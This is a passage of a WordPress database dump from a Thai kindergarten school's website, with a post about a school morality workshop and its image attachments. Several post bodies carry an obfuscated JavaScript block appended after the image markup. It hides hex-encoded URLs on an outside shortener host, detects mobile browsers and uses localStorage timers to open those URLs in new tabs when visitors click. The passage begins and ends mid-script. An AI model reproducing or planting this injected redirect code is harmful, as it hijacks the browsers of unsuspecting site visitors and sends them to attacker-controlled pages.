)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันศุกร์ที่ 20 กันยายน 2567 โรงเรียนอนุบาลวัดพระโตได้จัดกิจกรรม การประชุมเชิงปฏิบัติการ \"ค่ายพัฒนาจริยคุณ ตามแนวทางโรงเรียนคุณธรรม สพฐ.\" ภายใต้โครงการพัฒนาคุณธรรม จริยธรรม ณ หอประชุมโรงเรียนอนุบาลวัดพระโต โดยมีนางวิชุดา ชัยชาญ ผู้อำนวยการโรงเรียนตะดอบวิทยา คณะครูและนักเรียนโรงเรียนตะดอบวิทยา เป็นวิทยากร คณะผู้บริหาร ครูและบุคลากรทางการศึกษา แกนนำนักเรียน และสภานักเรียนโรงเรียนอนุบาลวัดพระโตได้เข้าร่วมกิจกรรมอย่างพร้อมเพรียง','','publish','open','open','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-20-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2','','','2024-10-01 13:58:27','2024-10-01 06:58:27','',0,'http://watprato.ssk.in.th/?p=457',0,'post','',0),
(458,2,'2024-10-01 13:56:17','2024-10-01 06:56:17','','461415627_122180698514202781_2938126010588144011_n','','inherit','open','closed','','461415627_122180698514202781_2938126010588144011_n','','','2024-10-01 13:56:17','2024-10-01 06:56:17','',457,'http://watprato.ssk.in.th/wp-content/uploads/2024/10/461415627_122180698514202781_2938126010588144011_n.jpg',0,'attachment','image/jpeg',0),
(459,2,'2024-10-01 13:56:47','2024-10-01 06:56:47','','461609374_122180697116202781_2314377563164186579_n','','inherit','open','closed','','461609374_122180697116202781_2314377563164186579_n','','','2024-10-01 13:56:47','2024-10-01 06:56:47','',457,'http://watprato.ssk.in.th/wp-content/uploads/2024/10/461609374_122180697116202781_2314377563164186579_n.jpg',0,'attachment','image/jpeg',0),
(460,2,'2024-10-01 13:57:13','2024-10-01 06:57:13','','461491731_122180699546202781_1978514125640280905_n','','inherit','open','closed','','461491731_122180699546202781_1978514125640280905_n','','','2024-10-01 13:57:13','2024-10-01 06:57:13','',457,'http://watprato.ssk.in.th/wp-content/uploads/2024/10/461491731_122180699546202781_1978514125640280905_n.jpg',0,'attachment','image/jpeg',0),
(461,2,'2024-10-01 13:57:42','2024-10-01 06:57:42','','461296346_122180699444202781_3345559820320118519_n','','inherit','open','closed','','461296346_122180699444202781_3345559820320118519_n','','','2024-10-01 13:57:42','2024-10-01 06:57:42','',457,'http://watprato.ssk.in.th/wp-content/uploads/2024/10/461296346_122180699444202781_3345559820320118519_n.jpg',0,'attachment','image/jpeg',0),
(462,2,'2024-10-01 13:58:26','2024-10-01 06:58:26','<!-- wp:image {\"id\":458,\"sizeSlug\":\"full\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461415627_122180698514202781_2938126010588144011_n.jpg\" alt=\"\" class=\"wp-image-458\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":460,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461491731_122180699546202781_1978514125640280905_n-1024x726.jpg\" alt=\"\" class=\"wp-image-460\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":461,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461296346_122180699444202781_3345559820320118519_n-1024x726.jpg\" alt=\"\" class=\"wp-image-461\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เมื่อวันศุกร์ที่ 20 กันยายน 2567 โรงเรียนอนุบาลวัดพระโตได้จัดกิจกรรม การประชุมเชิงปฏิบัติการ \"ค่ายพัฒนาจริยคุณ ตามแนวทางโรงเรียนคุณธรรม สพฐ.\" ภายใต้โครงการพัฒนาคุณธรรม จริยธรรม ณ หอประชุมโรงเรียนอนุบาลวัดพระโต โดยมีนางวิชุดา ชัยชาญ ผู้อำนวยการโรงเรียนตะดอบวิทยา คณะครูและนักเรียนโรงเรียนตะดอบวิทยา เป็นวิทยากร คณะผู้บริหาร ครูและบุคลากรทางการศึกษา แกนนำนักเรียน และสภานักเรียนโรงเรียนอนุบาลวัดพระโตได้เข้าร่วมกิจกรรมอย่างพร้อมเพรียง','','inherit','closed','closed','','457-revision-v1','','','2024-10-01 13:58:26','2024-10-01 06:58:26','',457,'http://watprato.ssk.in.th/?p=462',0,'revision','',0),
(463,2,'2024-10-01 14:00:40','2024-10-01 07:00:40','<!-- wp:image {\"id\":464,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/10/461609374_122180697116202781_2314377563164186579_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-464\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 